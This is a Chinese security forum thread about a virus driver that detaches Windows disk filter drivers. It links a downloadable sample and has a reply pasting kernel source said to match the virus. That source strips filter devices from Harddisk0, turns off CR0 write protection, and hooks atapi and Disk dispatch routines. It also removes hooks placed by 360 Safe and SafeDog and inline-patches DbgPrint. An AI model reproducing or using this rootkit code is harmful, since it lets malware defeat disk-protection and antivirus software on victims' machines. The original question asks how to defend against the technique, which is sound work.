脱链磁盘过滤驱动

最近出来了一个非常厉害的毒,利用的是脱链..

按我的理解,磁盘过滤驱动,不可以动态的卸下,就应该说无法脱链.但是他却是做到了..

用devicetree查看时,发现磁盘过滤驱动全部不在了.

上传上,我找出来的驱动,希望有高手可以帮忙看一下.


有没有办法不让他脱链呢.谢谢

 abc.rar

类型：

售价：0

大小：3KB

下载：194次

描述：毒的驱动

[下载]

 abc.rar

类型：

售价：0

大小：3KB

下载：194次

描述：毒的驱动

[下载]

太强了,一般人搞不动,N人又没空搞

现在都不走标准IRP流程,全内部未公开HOOK处理.

faint，一用就死机，是64位系统上的说？？

XP,2003上非常稳定的...至少现在还没有遇上死机的.

????

核心代码看了下，从网上找到这段，和原病毒的效果几乎一样（或者说就是原代码）：
VOID
Reinitialize(
IN PDRIVER_OBJECT DriverObject,
IN PVOID Context,
IN ULONG Count
){

OBJECT_ATTRIBUTES ObjectAttributes;
PDEVICE_OBJECT devobj;
UNICODE_STRING aDeviceHarddisk,aDriverProtecte;
UNICODE_STRING aDriverAtapi,aDriverDisk,safedog;
HANDLE DirectoryHandle;
PVOID Object;
PDRIVER_OBJECT atapiobj,protectdrv,diskdrv,dogdrv;
ULONG mjcreate,systemservice,foundaddr,pointer,iopointer,dbgpoint;
int v10,i;
unsigned int count;
RtlInitUnicodeString(&aDeviceHarddisk,L"\\Device\\Harddisk0");
ObjectAttributes.Length = 24;
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.ObjectName =&aDeviceHarddisk;
ObjectAttributes.Attributes = 64;
ObjectAttributes.SecurityDescriptor = 0;
ObjectAttributes.SecurityQualityOfService = 0;

if ( !ZwOpenDirectoryObject(&DirectoryHandle, DIRECTORY_QUERY, &ObjectAttributes) )
{
if ( !ObReferenceObjectByHandle(DirectoryHandle, 1, 0, 0, &Object, 0) )
{
if ( Object )
{
count = 0;
while (count < 0x28 )//抹掉DR0的AttachDevice
{
v10 = *((DWORD *)Object + count);
if ( v10 )
{
devobj = *(PDEVICE_OBJECT*)(v10 + 4);
if ( devobj->Type == 3 ) {
if ( devobj->AttachedDevice )
{
dr0attach = devobj->AttachedDevice;
dr0dev = devobj;
devobj->AttachedDevice = 0;
break;
}
}
}
++count;
}

}
ObDereferenceObject( Object);
}
ZwClose(DirectoryHandle);
}
__asm
{
mov eax, CR0
and eax, 0FFFEFFFFh
mov CR0, eax
}

RtlInitUnicodeString(&aDriverAtapi,L"\\Driver\\atapi");
ObReferenceObjectByName(&aDriverAtapi,64,0, OBJ_CASE_INSENSITIVE, *IoDriverObjectType, 0, 0,&atapiobj);
FindDispatch();

atapiobj->MajorFunction[IRP_MJ_SCSI]=(PDRIVER_DISPATCH)scsi;
atapiobj->MajorFunction[IRP_MJ_DEVICE_CONTROL]=(PDRIVER_DISPATCH)devctrl;
atapiobj->MajorFunction[IRP_MJ_POWER]=(PDRIVER_DISPATCH)power;
atapiobj->MajorFunction[IRP_MJ_PNP ]=(PDRIVER_DISPATCH)pnp;
atapiobj->MajorFunction[IRP_MJ_SYSTEM_CONTROL ]=(PDRIVER_DISPATCH)sysctrl;

RtlInitUnicodeString(&aDriverProtecte,L"\\Driver\\ProtectedC");
RtlInitUnicodeString(&aDriverDisk,L"\\Driver\\Disk");
if ( !ObReferenceObjectByName(&aDriverProtecte, 64, 0,OBJ_CASE_INSENSITIVE, *IoDriverObjectType, 0, 0, &protectdrv) )
{
if ( protectdrv )
{
if ( !ObReferenceObjectByName(&aDriverDisk, 64, 0, OBJ_CASE_INSENSITIVE, *IoDriverObjectType, 0, 0, &diskdrv) )
{
if ( diskdrv )
{
if ( diskdrv->MajorFunction[IRP_MJ_CREATE] == diskdrv->MajorFunction[IRP_MJ_CLOSE ] )
{
mjcreate = (ULONG)diskdrv->MajorFunction[IRP_MJ_CREATE];
i=0;
while(i<=IRP_MJ_MAXIMUM_FUNCTION)
diskdrv->MajorFunction[i++]=(PDRIVER_DISPATCH)mjcreate;
}
}
}
}
}

PatchSSDT();
systemservice=(ULONG)ZwAccessCheckAndAuditAlarm+13+*(ULONG*)((ULONG)ZwAccessCheckAndAuditAlarm+13)+4;
DbgPrint("KiSystemService - %x",systemservice);
count=0;
foundaddr=0;
while(count<0x300)
{

if(*(unsigned char*)(systemservice+count)==0x8B&&
*(unsigned char*)(systemservice+count+1)==0x1C&&
*(unsigned char*)(systemservice+count+2)==0x87)
{
foundaddr=systemservice+count+3;
break;
}
count++;
}
//还原360保险箱对KiSystemService的钩子
/*
804d5e77 8b1c87 mov ebx,dword ptr [edi+eax*4]
804d5e7a 2be1 sub esp,ecx
804d5e7c c1e902 shr ecx,2
804d5e7f 8bfc mov edi,esp
804d5e81 3b35b4745480 cmp esi,dword ptr [nt!MmUserProbeAddress (805474b4)]
*/

if(foundaddr){

*(ULONG*)((ULONG)recover+9)=*(ULONG*)MmUserProbeAddress;
pointer=(ULONG)recover;
for(i=0;i<13;i++,foundaddr++,pointer++)
*(unsigned char*)foundaddr=*(unsigned char*)pointer;
}

RtlInitUnicodeString(&safedog,L"\\Driver\\SafeDog");
if ( !ObReferenceObjectByName(&safedog, 64, 0, OBJ_CASE_INSENSITIVE, *IoDriverObjectType, 0, 0, &dogdrv))
{
if(dogdrv)
{

iopointer=(ULONG)IoGetDeviceObjectPointer;
*(unsigned char*)(iopointer)=0x8b;
*(unsigned char*)(iopointer+1)=0xff;
*(unsigned char*)(iopointer+2)=0x55;
*(unsigned char*)(iopointer+3)=0x8b;
*(unsigned char*)(iopointer+4)=0xec;

}
}
dbgpoint=(ULONG)DbgPrint;//inline DbgPrint()
retaddr=dbgpoint+5;
*(unsigned char*)dbgpoint=0xE9;
*(ULONG*)((ULONG)dbgpoint+1)=(ULONG)MyDbgPrint-(ULONG)dbgpoint-5;

__asm
{
mov eax, CR0
or eax, NOT 0FFFEFFFFh
mov CR0, eax
}
}

NTSTATUS
Dispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
){

IofCompleteRequest(Irp, 0);
return 0;
}

VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING SymbolicLinkName;
RtlInitUnicodeString(&SymbolicLinkName,L"\\DosDevices\\32ef43d02471c26e");
IoDeleteSymbolicLink(&SymbolicLinkName);
IoDeleteDevice(DriverObject->DeviceObject);

}

就这个也叫强大！！！我早就玩过的！！小把戏

？？？

不错，看看：）

瞧瞧，学习。。